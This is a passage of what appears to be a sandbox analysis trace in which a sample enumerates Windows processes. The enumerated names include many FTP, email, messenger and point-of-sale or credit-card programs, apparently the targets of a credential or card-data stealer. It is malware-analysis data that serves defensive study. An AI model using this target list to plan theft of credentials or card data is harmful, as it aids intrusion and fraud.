cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.822] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.823] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.827] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.829] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.830] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.832] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.833] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.835] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.836] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.837] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.869] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.871] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.873] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.875] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.877] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.879] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.881] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.882] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.884] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0222.890] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.892] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.894] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.896] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.898] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.900] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0222.902] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0222.907] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0222.909] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0222.911] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0222.912] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0222.914] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0222.916] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0222.953] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0222.955] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0222.956] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0222.958] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0222.960] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0222.961] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0222.966] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0222.968] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0222.970] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0222.972] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.974] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.975] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0222.977] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.982] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.984] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.986] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.988] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.990] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.993] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.047] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.050] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.052] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.054] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.060] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0223.063] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0223.065] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0223.068] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0223.070] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0223.072] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0223.078] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0223.081] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0223.083] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0223.085] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0223.087] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0223.122] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0223.124] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0223.127] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0223.129] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0223.131] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0223.133] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0223.138] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0223.141] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0223.143] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0223.145] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0223.147] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0223.149] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0223.152] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0223.157] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0223.159] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0223.161] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0223.163] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0223.165] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 